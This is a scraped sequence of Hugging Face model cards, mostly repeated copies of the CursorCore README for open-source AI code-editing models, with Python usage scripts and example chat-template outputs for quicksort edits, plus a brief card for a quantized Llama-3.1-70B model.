<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning the models with data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
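The GPTQ weights in this repository can also be loaded with the `auto-gptq` library directly, as an alternative to the `transformers` integration. This is a hedged sketch; the argument names follow the `auto-gptq` examples and may differ between versions:
````python
from transformers import AutoTokenizer
from auto_gptq import AutoGPTQForCausalLM

# Load the GPTQ checkpoint via auto-gptq itself (alternative to transformers' GPTQ integration).
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-QW2.5-1.5B-GPTQ")
model = AutoGPTQForCausalLM.from_quantized(
    "TechxGenus/CursorCore-QW2.5-1.5B-GPTQ",
    device="cuda:0",
    use_safetensors=True
)
````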
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for the AI-assisted programming task. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
altomek/Llama-3.1-70B-Instruct-5bpw-EXL2 | altomek | 2024-10-10T06:41:56Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"facebook",
"meta",
"pytorch",
"llama-3",
"conversational",
"en",
"de",
"fr",
"it",
"pt",
"hi",
"es",
"th",
"base_model:NousResearch/Meta-Llama-3.1-70B-Instruct",
"base_model:quantized:NousResearch/Meta-Llama-3.1-70B-Instruct",
"license:llama3.1",
"autotrain_compatible",
"text-generation-inference",
"5-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-09T19:22:34Z | ---
language:
- en
- de
- fr
- it
- pt
- hi
- es
- th
library_name: transformers
license: llama3.1
pipeline_tag: text-generation
tags:
- facebook
- meta
- pytorch
- llama
- llama-3
inference: false
base_model: NousResearch/Meta-Llama-3.1-70B-Instruct
---
# Meta-Llama-3.1-70B-Instruct
An ExLlamaV2 5 bpw (bits per weight) quant of https://huggingface.co/NousResearch/Meta-Llama-3.1-70B-Instruct.
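Below is a minimal sketch of loading this quant with the `exllamav2` Python API. It assumes the repository has been downloaded to a local directory and that a recent exllamav2 release is installed; the class and method names follow the upstream examples and may differ between versions.
````python
from exllamav2 import ExLlamaV2, ExLlamaV2Config, ExLlamaV2Cache, ExLlamaV2Tokenizer
from exllamav2.generator import ExLlamaV2DynamicGenerator

# Point the config at the locally downloaded EXL2 weights (example path).
config = ExLlamaV2Config("./Llama-3.1-70B-Instruct-5bpw-EXL2")
model = ExLlamaV2(config)
cache = ExLlamaV2Cache(model, lazy=True)   # KV cache is allocated as layers are loaded
model.load_autosplit(cache)                # split the 70B weights across available GPUs
tokenizer = ExLlamaV2Tokenizer(config)

generator = ExLlamaV2DynamicGenerator(model=model, cache=cache, tokenizer=tokenizer)
print(generator.generate(prompt="Hello!", max_new_tokens=64))
````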
|
TechxGenus/CursorCore-Yi-1.5B-LC | TechxGenus | 2024-10-10T06:41:02Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:01-ai/Yi-Coder-1.5B",
"base_model:finetune:01-ai/Yi-Coder-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T13:40:19Z | ---
tags:
- code
base_model:
- 01-ai/Yi-Coder-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning the models with data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
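For interactive use, the same call can stream tokens as they are produced instead of returning the full sequence at once. A small sketch reusing the `model`, `tokenizer`, and `inputs` objects from the script above (`TextStreamer` simply prints decoded tokens to stdout as they arrive):
````python
from transformers import TextStreamer

# Print tokens as they are generated rather than waiting for the full reply.
streamer = TextStreamer(tokenizer, skip_prompt=True)
model.generate(
    input_ids=inputs.to(model.device),
    max_new_tokens=512,
    streamer=streamer
)
````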
### 2) Assistant-Conversation
In our work, we introduce a new framework for the AI-assisted programming task. It is designed to align anything during the programming process and is used to implement features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-Yi-1.5B-LC-AWQ | TechxGenus | 2024-10-10T06:39:55Z | 78 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-Yi-1.5B-LC",
"base_model:quantized:TechxGenus/CursorCore-Yi-1.5B-LC",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-10-06T14:22:03Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-Yi-1.5B-LC
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
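This repository contains the AWQ-quantized weights of CursorCore-Yi-1.5B-LC. As a minimal sketch (assuming a recent `transformers` with the `autoawq` backend installed, which is not covered by the scripts below), the quantized checkpoint can likely be loaded the same way as the full-precision models:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

# Assumption: `pip install autoawq` so transformers can run the AWQ checkpoint on GPU.
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC-AWQ")
model = AutoModelForCausalLM.from_pretrained(
    "TechxGenus/CursorCore-Yi-1.5B-LC-AWQ",
    torch_dtype=torch.float16,  # AWQ kernels typically run in fp16
    device_map="auto"
)
````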
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process, and it is used to implement features such as Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
